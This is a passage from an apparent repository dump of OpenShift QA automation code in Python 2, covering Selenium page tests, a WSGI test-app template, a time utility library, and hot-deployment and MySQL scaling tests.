baseutils.click_element_by_xpath(self,\"//img[@alt='OpenShift Logo']\")\n time.sleep(5)\n baseutils.check_title(self,\"OpenShift by Red Hat\")\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\"//section[@id='opener']/div/a\")\n time.sleep(5)\n if not baseutils.is_element_displayed(self,By.ID,\"signup\"):\n 
baseutils.click_element_by_xpath(self,\"//section[@id='opener']/div/a\")\n# baseutils.check_title(self,\"OpenShift by Red Hat | Sign up for OpenShift\")\n baseutils.click_element_by_css_no_wait(self,\"#signup > a.close_button > img\")\n baseutils.click_element_by_xpath(self,\"//section[@id='bottom_signup']/div/a\")\n# baseutils.check_title(self,\"OpenShift by Red Hat | Sign up for OpenShift\")\n time.sleep(5)\n baseutils.is_element_displayed(self,By.ID,\"signup\")\n \n\n def test_c_check_home_contents(self):\n baseutils.go_to_home(self)\n baseutils.assert_element_present_by_xpath(self,\"//img[@alt='OpenShift Logo']\")\n baseutils.assert_text_equal_by_css(self,\"GO BEYOND THE CLOUDS\",\"div.content > header > hgroup > h1\")\n baseutils.assert_text_equal_by_css(self,\"JAVA PHP RUBY PYTHON PERL\",\"div.content > header > hgroup > h2\")\n# baseutils.assert_element_present_by_xpath(self,\"//img[@alt='Panda pilot, soaring through the clouds!']\")\n baseutils.assert_text_equal_by_css(self,\"WHAT IS OPENSHIFT?\",\"#exposition > header > h1\")\n baseutils.assert_text_equal_by_css(self,\"OpenShift is a free, auto-scaling platform-as-a-service for Java, Ruby, PHP, Perl and Python applications.\",\"#intro\")\n baseutils.assert_element_present_by_css(self,\"img.icon\")\n baseutils.assert_text_equal_by_xpath(self,\"WHY USE OPENSHIFT?\",\"//section[@id='exposition']/header[2]/h1\")\n baseutils.assert_text_equal_by_css(self,\"Time of the essence? Just upload code and go!\",\"header > h2\")\n baseutils.assert_text_equal_by_xpath(self,\"Whether you prefer the command line or a browser-based interface, OpenShift provides the fastest and easiest on-ramp to the cloud for free.\",\".//*[@id='fast']/p\")\n baseutils.assert_text_equal_by_css(self,\"Experiencing growing pains? OpenShift is tailored to meet your needs.\",\"#free > header > h2\") \n baseutils.assert_text_equal_by_xpath(self,\"OpenShift adapts to the varying needs of your app with auto-scaling built-in. No need for complicated scripts or additional coding.\",\".//*[@id='free']/p\")\n baseutils.assert_element_present_by_css(self,\"#free > img.icon\")\n baseutils.assert_element_present_by_css(self,\"#open > img.icon\")\n baseutils.assert_text_equal_by_css(self,\"Don't get locked in! Choose your languages, frameworks, middleware and clouds.\",\"#open > header > h2\")\n baseutils.assert_text_equal_by_css(self,\"Keep your options open. 
OpenShift is based on Open Source with support for Java, PHP, Ruby, Python, and Perl and more.\",\"#open > p\")\n\n def test_da_check_home_twitter(self):\n baseutils.go_to_home(self)\n baseutils.assert_element_present_by_xpath(self,\".//*[@id='latest']/a/img\")\n baseutils.assert_element_present_by_xpath(self,\".//*[@id='latest']/p\")\n # baseutils.assert_element_present_by_css(self,\"li > img.avatar\")\n # baseutils.assert_element_present_by_css(self,\"li > p.tweet\")\n baseutils.assert_element_present_by_xpath(self,\".//*[@id='retweets']/ul/li[*]/a/img\")\n baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[*]/p\")\n # baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[2]/img\")\n # baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[2]/p\")\n # baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[3]/img\")\n # baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[4]/img\")\n # baseutils.assert_element_present_by_xpath(self,\"//div[@id='retweets']/ul/li[4]/p\")\n \n baseutils.scroll_by(self)\n if config.proxy:\n baseutils.click_element_by_xpath(self,\"//*[@id='social_links']/a[1]\")\n time.sleep(5)\n baseutils.check_title(self,\"Twitter / Search - openshift\")\n baseutils.go_back(self)\n else: \n baseutils.assert_element_present_by_link_text(self,\"More #openshift buzz\")\n baseutils.assert_element_present_by_xpath(self,\"//a[contains(text(),'Follow @OpenShift')]\")\n \n def test_e_check_header_announcements(self):\n baseutils.go_to_home(self)\n baseutils.assert_element_present_by_xpath(self,\".//*[@id='announcements']/ul/li[*]/a\")\n # baseutils.is_element_displayed(self,By.XPATH,\".//*[@id='announcements']/ul/li[1]/a\")\n baseutils.click_element_by_xpath_wait(self,\".//*[@id='announcements']/ul/li[*]/a\")\n if self.driver.title == \"OpenShift Newsletter Signup\": pass\n elif self.driver.title == \"Red Hat OpenShift (openshift) on Twitter\":pass\n else: baseutils.assert_text_equal_by_xpath(self,\"Got a cool app? Tell us about it!\",\".//*[@id='announcements']/ul/li[3]/a/div[1]\")\n baseutils.check_title(self,\"OpenShift Newsletter Signup\")\n baseutils.go_back(self)\n baseutils.is_element_displayed(self,By.XPATH,\".//*[@id='announcements']/ul/li[2]/a\")\n baseutils.click_element_by_xpath_no_wait(self,\".//*[@id='announcements']/ul/li[2]/a\")\n time.sleep(5)\n baseutils.check_title(self,\"Red Hat OpenShift (openshift) on Twitter\")\n baseutils.go_back(self)\n baseutils.is_element_displayed(self,By.XPATH,\"//aside[@id='announcements']/ul/li[3]/a\")\n baseutils.assert_text_equal_by_xpath(self,\"Got a cool app? 
Tell us about it!\",\".//*[@id='announcements']/ul/li[3]/a/div[1]\")\n \n def test_f_check_home_footer(self):\n baseutils.go_to_home(self)\n baseutils.assert_text_equal_by_css(self,\"News\",\"li > header > h2\")\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Announcements')]\")\n baseutils.check_title(self,\"News and Announcements | Red Hat OpenShift Community\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Blog')]\")\n baseutils.check_title(self,\"OpenShift Blog | Red Hat OpenShift Community\")\n baseutils.go_back(self)\n if config.proxy:\n baseutils.click_element_by_xpath(self,\"//a[@href='http://www.twitter.com/#!/openshift']\")\n baseutils.check_title(self,\"Red Hat OpenShift (openshift) on Twitter\")\n baseutils.go_back(self)\n else: baseutils.assert_element_present_by_xpath(self,\"//a[@href='http://www.twitter.com/#!/openshift']\")\n baseutils.assert_text_equal_by_xpath(self,\"Community\",\"//li[2]/header/h2\")\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Forum')]\")\n baseutils.check_title(self,\"Forums | Red Hat OpenShift Community\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Partner Program')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Meet Our Partners\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[@href='http://webchat.freenode.net/?randomnick=1&channels=openshift&uio=d4']\")\n baseutils.check_title(self,\"Connection details - freenode Web IRC\")\n baseutils.go_back(self)\n baseutils.assert_element_present_by_link_text(self,\"Feedback\")\n baseutils.assert_text_equal_by_xpath(self,\"Legal\",\"//li[3]/header/h2\")\n baseutils.click_element_by_xpath(self,\"//a[contains(@href, '/app/legal')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Terms and Conditions\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(@href, '/app/legal/openshift_privacy')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | OpenShift Privacy Statement\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(@href, 'https://access.redhat.com/security/team/contact/')]\")\n baseutils.check_title(self,\"access.redhat.com | Security contacts and procedures\")\n baseutils.go_back(self)\n baseutils.assert_text_equal_by_xpath(self,\"Help\",\"//li[4]/header/h2\")\n baseutils.click_element_by_xpath(self,\"//a[@href='http://www.redhat.com/openshift/faq']\")\n baseutils.check_title(self,\"Frequently Asked Questions | Red Hat OpenShift Community\")\n baseutils.go_back(self)\n baseutils.assert_element_present_by_xpath(self,\"//a[contains(text(),'Contact')]\")\n\n\n def test_g_check_legal_links(self):\n baseutils.go_to_legal(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'OpenShift Preview Services Agreement')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | OpenShift Preview Services Agreement\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Acceptable Use Policy')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Acceptable Use Policy\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Privacy Policy')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | OpenShift Privacy Statement\")\n baseutils.go_back(self)\n baseutils.click_element_by_xpath(self,\"//a[contains(text(),'Terms of Use')]\")\n baseutils.check_title(self,\"OpenShift by Red Hat | Terms of 
Use\")\n baseutils.go_back(self)\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n \n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.614814817905426, "alphanum_fraction": 0.619259238243103, "avg_line_length": 37.57143020629883, "blob_id": "bd1d21444947325ad6864036ac94a49b94c192fe", "content_id": "e95d23c011134fc5458f1f83ae2c7cd613adcc1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1350, "license_type": "no_license", "max_line_length": 154, "num_lines": 35, "path": "/automation/open/testmodules/RT/cartridge/app_template/universal/python/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport commands\nfrom cgi import escape\nfrom urlparse import parse_qs\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \n\ndef application(environ, start_response):\n params = parse_qs(environ.get('QUERY_STRING', ''))\n ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s=%s' % (key, value)\n for key, value in sorted(os.environ.items())]\n response_body = '\\n'.join(response_body)\n else:\n response_body = \"Usage: %s/<group>\\nValid groups are 'shell', 'mongodb', 'mysql', 'postgresql', 'env'\" % (os.environ['OPENSHIFT_APP_DNS'])\n\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 32, "blob_id": "1ce42ae14787cc8d9cc98fbe9cd9cf36de0eef45", "content_id": "ae35cf6dc276244eaf60fbb4ba1ac5c5eddaf33d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 59, "num_lines": 3, "path": "/automation/open/testmodules/Collections/Demo/__init__.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# place holder do we can do immports.\n\n### this directory holds a collection of top level testcase \n" }, { "alpha_fraction": 0.6207822561264038, "alphanum_fraction": 0.6491522789001465, "avg_line_length": 24.44871711730957, "blob_id": "16a5056cbfc6b6dea86934f668d6813c4893a122", "content_id": "7bd13b576eaec3ec6156c20d44594f9bb25aa6f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5957, "license_type": "no_license", "max_line_length": 85, "num_lines": 234, "path": "/automation/open/lib/timelib.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nTime related functions. 
You can use this in place of the stock 'time' module.\nIt adds some additional time related functions, and a MutableTime class.\n\n\"\"\"\n\n\nfrom time import *\nnow = time\n\n# Python time tuple:\n# Index Attribute Values \n# 0 tm_year (for example, 1993)\n# 1 tm_mon range [1,12]\n# 2 tm_mday range [1,31]\n# 3 tm_hour range [0,23]\n# 4 tm_min range [0,59]\n# 5 tm_sec range [0,61]; see (1) in strftime() description\n# 6 tm_wday range [0,6], Monday is 0\n# 7 tm_yday range [1,366]\n# 8 tm_isdst 0, 1 or -1; see below\n\n# for some reason the Python time module uses a struct_time that is read only.\n# So, this time class mirrors it, but this can have different elements set. It\n# also extends it with logical time functionality.\nclass MutableTime(object):\n\tINDEXMAP = {\"tm_year\":0, \"tm_mon\":1, \"tm_mday\":2, \"tm_hour\":3, \"tm_min\":4,\n\t\t\t\"tm_sec\":5, \"tm_wday\":6, \"tm_yday\":7, \"tm_isdst\":8,\n\t\t\t# more \"rememberable\" names...\n\t\t\t\"year\":0, \"month\":1, \"day\":2, \"hour\":3, \"minute\":4,\n\t\t\t\"second\":5, \"weekday\":6, \"yday\":7, \"isdst\":8 }\n\n\tdef __init__(self, init=None, fmt=None):\n\t\tif init is None:\n\t\t\tself._tm = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n\t\telse:\n\t\t\tself._tm = list(init)\n\t\t\tassert len(self._tm) == 9\n\t\tself._fmt = fmt or \"%a %b %d %H:%M:%S %Y\"\n\n\tdef __repr__(self):\n\t\treturn \"%s(%r, %r)\" % (self.__class__.__name__, self._tm, self._fmt)\n\n\tdef __str__(self):\n\t\treturn strftime(self._fmt, self._tm)\n\n\tdef __iter__(self):\n\t\treturn iter(self._tm)\n\n\tdef __float__(self):\n\t\treturn mktime(self._tm)\n\n\tdef __int__(self):\n\t\treturn int(self.__float__())\n\n\tdef __coerce__(self, other):\n\t\ttry:\n\t\t\treturn mktime(self._tm), float(other)\n\t\texcept:\n\t\t\treturn None\n\n\tdef __len__(self):\n\t\treturn len(self._tm)\n\n\tdef __eq__(self, other):\n\t\treturn list(self) == list(other)\n\n\tdef __getitem__(self, idx):\n\t\treturn self._tm[idx]\n\n\tdef __setitem__(self, idx, val):\n\t\tself._tm[idx] = int(val)\n\n\tdef __getattribute__(self, key):\n\t\ttry:\n\t\t\treturn object.__getattribute__(self, key)\n\t\texcept AttributeError:\n\t\t\ttry:\n\t\t\t\treturn self._tm[self.INDEXMAP[key]]\n\t\t\texcept KeyError:\n\t\t\t\traise AttributeError, \"no attribute '%s' found.\" % (key,)\n\n\tdef __setattr__(self, name, val):\n\t\tidx = self.INDEXMAP.get(name, None)\n\t\tif idx is None:\n\t\t\tobject.__setattr__(self, name, val)\n\t\telse:\n\t\t\tself._tm[idx] = int(val)\n\n\tdef __sub__(self, other):\n\t\treturn mktime(self._tm) - mktime(tuple(other))\n\n\tdef __add__(self, secs):\n\t\tnew = self.__class__(self._tm[:], self._fmt)\n\t\tnew.add_seconds(secs)\n\t\treturn new\n\n\tdef __mul__(self, other):\n\t\treturn mktime(self._tm) * float(other)\n\n\tdef __div__(self, other):\n\t\treturn mktime(self._tm) / float(other)\n\n\tdef __iadd__(self, secs):\n\t\tcsec = mktime(self._tm)\n\t\tcsec += secs\n\t\tself._tm = localtime(csec)\n\t\treturn self\n\n\tdef __isub__(self, secs):\n\t\tcsec = mktime(self._tm)\n\t\tcsec -= secs\n\t\tself._tm = localtime(csec)\n\t\treturn self\n\t\n\tdef copy(self):\n\t\treturn self.__class__(self._tm, self._fmt)\n\n\tdef localtime(self, secs=None):\n\t\tif secs: # must do it this way because these functions check arg length, not value.\n\t\t\tself._tm = list(localtime(secs))\n\t\telse:\n\t\t\tself._tm = list(localtime())\n\t\treturn self\n\n\tdef gmtime(self, secs=None):\n\t\tif secs:\n\t\t\tself._tm = list(gmtime(secs))\n\t\telse:\n\t\t\tself._tm = list(gmtime())\n\t\treturn self\n\n\tdef 
strftime(self, fmt=None):\n\t\treturn strftime(fmt or self._fmt, self._tm)\n\n\tdef strptime(self, val, fmt=None):\n\t\tttl = list(strptime(val, fmt or self._fmt))\n\t\tttl[-1] = localtime()[-1] # preserve dstflag - bug workaround\n\t\tself._tm = ttl\n\t\treturn self\n\n\tdef set_format(self, fmt):\n\t\tself._fmt = str(fmt)\n\n\tdef add_seconds(self, secs):\n\t\tself.__iadd__(secs)\n\n\tdef add_minutes(self, mins):\n\t\tself.add_seconds(mins*60)\n\n\tdef add_hours(self, hours):\n\t\tself.add_seconds(hours*3600)\n\n\tdef add(self, minutes=0, hours=0, days=0, weeks=0):\n\t\tself.add_seconds(seconds(minutes, hours, days, weeks))\n\n\tdef add_time(self, timediff):\n\t\t\"\"\"add_time(timediff) Adds specified amount of time to the current\n\t\ttime held in this object. The format of timediff is a string,\n\t\t\"HH:MM:SS\".\"\"\"\n\t\t[h, m, s] = map(int, timediff.split(\":\"))\n\t\tself.add_seconds(h*3600+m*60+s)\n\n\n# time module equivalents that return MutableTime objects.\ndef localtime_mutable(secs=None):\n\tmt = MutableTime()\n\tmt.localtime(secs)\n\treturn mt\n\ndef gmtime_mutable(secs=None):\n\tmt = MutableTime()\n\tmt.gmtime(secs)\n\treturn mt\n\ndef strptime_mutable(string, fmt=None):\n\tmt = MutableTime(fmt=fmt)\n\tmt.strptime(string)\n\treturn mt\n\ndef weekof(secs=None):\n\t\"\"\"Returns a date that is the Monday of the week specified in universal seconds.\"\"\"\n\tif secs is None:\n\t\tsecs = time()\n\tsecs = ((secs // 604800)*604800)-172800\n\treturn localtime(secs)\n\n\ndef seconds(minutes=0, hours=0, days=0, weeks=0):\n\t\"\"\"Returns a value in seconds given some minutes, hours, days, or weeks.\"\"\"\n\treturn minutes*60 + hours*3600 + days*86400 + weeks*604800\n\ndef HMS(secs):\n\t\"\"\"Return tuple of hours, minutes, and seconds given value in seconds.\"\"\"\n\tminutes, seconds = divmod(secs, 60.0)\n\thours, minutes = divmod(minutes, 60.0)\n\treturn hours, minutes, seconds\n\ndef HMS2str(hours, minutes, seconds):\n\treturn \"%02.0f:%02.0f:%02.2f\" % (hours, minutes, seconds)\n\ndef timestamp(fmt=\"%a, %d %b %Y %H:%M:%S +0000\"):\n\t\"\"\"Return string with current time, according to given format. Default is\nrfc822 compliant date value.\"\"\"\n\treturn strftime(fmt, gmtime())\ngmtimestamp = timestamp\nrfc822time = timestamp\n\ndef localtimestamp(fmt=\"%a, %d %b %Y %H:%M:%S %Z\", tm=None):\n\t\"\"\"Return string with current time, according to given format. 
Default is\nrfc822 compliant date value.\"\"\"\n\treturn strftime(fmt, tm or localtime())\n\n\nif __name__ == \"__main__\":\n\tmt = localtime_mutable()\n\tprint mt\n\tmt.add_seconds(3600)\n\tprint mt\n\tprint strftime(\"%Y-%m-%d\", weekof(time()))\n\n\tt = now()\n\tfor d in range(1, 60):\n\t\tweek = weekof(t+(d*60*60*24))\n\t\tprint MutableTime(week)\n\t\n\tprint \"Local time:\"\n\tprint localtimestamp()\n\n\n" }, { "alpha_fraction": 0.5349794030189514, "alphanum_fraction": 0.5412417054176331, "avg_line_length": 33.28834533691406, "blob_id": "d38a373791339e3a46ac71b778f56bd3f204badf", "content_id": "5794825d40b73ff4bb977c767e4061ceb928a7ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5589, "license_type": "no_license", "max_line_length": 107, "num_lines": 163, "path": "/automation/open/testmodules/RT/hot_deploy/hot_deploy_test.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nJul 25, 2012\n\nThis is the super class for hot-deployment testing\n\"\"\"\n\nimport rhtest\nimport common\nimport OSConf\nimport pexpect\nimport re\nfrom openshift import Openshift\nfrom shutil import rmtree\nfrom time import sleep\n\nclass HotDeployTest(rhtest.Test):\n \n def log_info(self, message):\n self.info(\"===========================\")\n self.info(message)\n self.info(\"===========================\")\n \n def initialize(self):\n self.log_info(\"Initializing...\")\n common.env_setup()\n # Creating the application\n\tself.app_type = self.config.application_type\n\tself.app_name = self.config.application_name\n common.create_app(\n self.config.application_name,\n self.config.application_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n clone_repo = True,\n git_repo = \"./\" + self.config.application_name,\n scalable = self.config.scalable\n )\n \n # Checking the application URL\n status, res = self.config.rest_api.app_get(self.config.application_name)\n if status == 'OK':\n self.config.application_url = res['app_url']\n else:\n self.config.applicaton_url = 'Not found'\n\n self.info(\"Application URL: \" + self.config.application_url)\n \n \n def finalize(self):\n self.log_info(\"Finalizing...\")\n rmtree(\"./%s\" % self.config.application_name)\n \n def enable_jenkins(self):\n self.log_info(\"Enabling Jenkins if it's necessary\")\n if self.config.jenkins_is_needed:\n common.create_app(\n \"jenkins\",\n common.app_types['jenkins'],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n clone_repo = False\n )\n common.embed(\n self.config.application_name, \n \"add-\" + common.cartridge_types[\"jenkins\"],\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd\n )\n \n def enable_hot_deployment(self):\n self.log_info(\"Enabling hot deployment support\")\n marker = open(\"./%s/.openshift/markers/hot_deploy\" % self.config.application_name, \"a\")\n marker.write(\"\\n\")\n marker.close()\n \n def configuration(self):\n # Setting up the code to retrieve process ID\n # It must be overriden\n pass\n \n# def get_process_id(self):\n# self.log_info(\"Getting the process ID\")\n# return int(common.fetch_page(\"%s/%s\" % ( self.config.application_url, self.config.file_name )))\n def get_process_id(self):\n pids = []\n if self.app_type.split('-')[0] in ('jbossas', 'jbosseap'):\n cmd = \"ssh %s 'ps aux |grep -v grep| grep -i standalone'\" % (OSConf.get_ssh_url(self.app_name))\n elif 'jbossews' in self.app_type:\n cmd = \"ssh %s 
'ps aux |grep -v grep| grep jre'\" % (OSConf.get_ssh_url(self.app_name))\n        else:\n            cmd = \"ssh %s 'ps aux |grep -v grep| grep bin/httpd'\" % (OSConf.get_ssh_url(self.app_name))\n        child = pexpect.spawn(cmd)\n\tprint \">>\"*50\n\tprint cmd\n\tprint \"<<\"*50\n        for line in child.readlines():\n            match = None\n            if self.app_type.split('-')[0] in ('jbossas', 'jbosseap'):\n                if 'jre' in line or 'standalone.sh' in line:\n                    print line\n                    match = re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n            elif 'jbossews' in self.app_type:\n                if 'java' in line:\n                    match = re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n            else:\n                if 'httpd -C Include' in line:\n                    match = re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n            if match:\n                if match.group(1) not in pids:\n                    pids.append(int(match.group(1)))\n        pids.sort()\n        return pids\n\n\n    def deploy(self):\n        deployment_steps = [\n            \"cd %s\" % self.config.application_name,\n            \"git add .\",\n            \"git commit -a -m 'Adding test file'\",\n            \"git push\"\n        ]\n        ret_code = common.command_get_status(\" && \".join(deployment_steps))\n        self.info(\"Waiting for the application...\")\n        sleep(30) # Waiting 30 seconds for the application\n        return ret_code\n    \n    def deploy_changes(self):\n        self.log_info(\"Modifying local git repo and push\")\n        steps = [\n            \"cd %s\" % self.config.application_name,\n            \"touch %s\" % common.getRandomString()\n        ]\n        common.command_get_status(\" && \".join(steps))\n        return self.deploy()\n    \n    def verification(self, lst1, lst2):\n        if len(lst1) > len(lst2):\n            return False\n        for i in range(len(lst1)):\n            if lst1[i] != lst2[i]:\n                return False\n#        return True\n#        self.info(\"PID1: %d\" % pid1)\n#        self.info(\"PID2: %d\" % pid2)\n#        self.assert_equal(pid1[], pid2)\n        # Everything is OK\n        return self.passed(self.config.summary)\n    \n    def test_method(self):\n        self.enable_jenkins()\n        self.enable_hot_deployment()\n        self.configuration()\n        pid_original = self.get_process_id()\n        self.deploy_changes()\n        pid_latter = self.get_process_id()\n\tprint \">>\"*50\n\tprint \"pid_original : %s\"%pid_original\n\tprint \"pid_latter : %s\"%pid_latter\n\tprint \"<<\"*50\n        return self.verification(pid_original, pid_latter)\n" }, { "alpha_fraction": 0.6774553656578064, "alphanum_fraction": 0.6902901530265808, "avg_line_length": 23.83333396911621, "blob_id": "321a681c8286732baec64a8069ebc3a61f5ba7b5", "content_id": "07120f8bdbf937e5646290eaab6033aefba8f744", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1792, "license_type": "no_license", "max_line_length": 100, "num_lines": 72, "path": "/automation/open/lib/supports/XML/pythonPOM.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4\n# License: LGPL\n# Keith Dart <[email protected]>\n\nfrom __future__ import generators\n\n\"\"\"\nUsed to make more efficient the use of POM for the python code generation and\nanalysis. \n\n\"\"\"\n\nimport XML.POM as POM\n\n# base class for all python parse tree elements. Since all are the same. 
Also\n# adds some query methods.\nclass TokenNode(POM.ElementNode):\n\tATTLIST = POM.AttributeList([POM.XMLAttribute('value', 1, 12, None)])\n\t_name = \"TokenNode\"\n\nclass SymbolNode(POM.ElementNode):\n\tCONTENTMODEL = POM.ContentModel(POM.ANY)\n\tATTLIST = POM.AttributeList([POM.XMLAttribute('value', 1, 12, None)])\n\t_name = \"SymbolNode\"\n\nclass PythonSource(POM.POMDocument):\n\tHEADER = '<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>\\n<!DOCTYPE file_input SYSTEM \"python.dtd\">\\n'\n\n\tdef get_leaf_values(self, n, elclass, line_info=0):\n\t\tfor cn in gen_leaf_nodes(n, elclass):\n\t\t\tif line_info:\n\t\t\t\tyield (cn.value, cn.lineno)\n\t\t\telse:\n\t\t\t\tyield cn.value\n\n\tdef strings(self, node=None, line_info=0):\n\t\t\"\"\"Strings([node])\nA generator function that iterates over string literal values in a document tree. \"\"\"\n\t\tn = node or self.root\n\t\treturn self.get_leaf_values(n, self.dtd.STRING, line_info)\n\n\tdef funcdefs(self, node=None, line_info=0):\n\t\tn = node or self.root\n\t\treturn self.get_leaf_values(n, self.dtd.funcdef, line_info)\n\n\nclass PyNodeIterator(object):\n\tdef __init__(self, node, elclass):\n\t\tself.l = node.getall(elclass, 100)\n\t\tself.i = 0\n\n\tdef __iter__(self):\n\t\treturn self\n\n\tdef next(self):\n\t\ttry:\n\t\t\tv = self.l[self.i].value\n\t\texcept IndexError:\n\t\t\traise StopIteration\n\t\tself.i += 1\n\t\treturn v\n\n\ndef gen_leaf_nodes(node, elclass):\n\tif isinstance(node, elclass):\n\t\tyield node\n\tfor child in node.get_children():\n\t\tfor cn in gen_leaf_nodes(child, elclass):\n\t\t\tyield cn\n\treturn\n\n\n\n\n" }, { "alpha_fraction": 0.5832825899124146, "alphanum_fraction": 0.5875431299209595, "avg_line_length": 34.97810363769531, "blob_id": "42c190ce7e31df6cd26141a277682f02f2054061", "content_id": "872e97641131587c7741177e4d354c52267673a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4929, "license_type": "no_license", "max_line_length": 134, "num_lines": 137, "path": "/automation/open/testmodules/RT/scaling/ruby_scaling_mysql.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\n# user defined packages\nimport fileinput\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = 'myruby' + common.getRandomString(5)\n try:\n variant = self.get_variant()\n except:\n variant = 'ruby'\n self.app_type = common.app_types[variant]\n self.info(\"VARIANT: %s\"%variant)\n common.env_setup()\n self.domain_name = common.get_domain_name()\n self.steps_list = []\n\n def finalize(self):\n pass\n \nclass RubyMysqlScaling(OpenShiftTest):\n def check_mysql_result(self):\n app_url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(\"http://%s/mysql\" % app_url, \"Tim Bunce, Advanced Perl DBI\", \"-H 'Pragma: no-cache'\", 5, 6)\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create a scalable %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type, self.user_email, self.user_passwd, True, \"./\" + self.app_name, True],\n expect_description = \"App should be created successfully\",\n expect_return = 
0\n            ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"embed mysql to %s\" % self.app_name,\n            common.embed,\n            expect_description = \"Embedding mysql should pass\",\n            function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd ],\n            expect_return = 0\n        ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Copy template files\",\n            \"cp %s/cartridge/app_template/mysql/config.ru %s/\" % (WORK_DIR + \"/../\", self.app_name),\n            expect_description = \"Operation must be successful\",\n            expect_return = 0\n        ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"git push code changes\",\n            \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n            expect_description = \"git push should pass without errors\",\n            expect_return = 0\n        ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Check MySql Result\",\n            self.check_mysql_result,\n            expect_description = \"Checking MySQL operation via web must pass\",\n            expect_return = 0\n        ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Scale-up the application via Rest API\",\n            common.scale_up,\n            function_parameters = [ self.app_name,],\n            expect_description = \"The application must scale-up successfully\",\n            expect_return = 0\n        ))\n        \n        for i in range(1,4):\n            self.steps_list.append(testcase.TestCaseStep(\n                \"Check MySql Result - %d\" % i,\n                self.check_mysql_result,\n                expect_description = \"Checking MySQL operation via web must be successful\",\n                expect_return = 0\n            ))\n\n        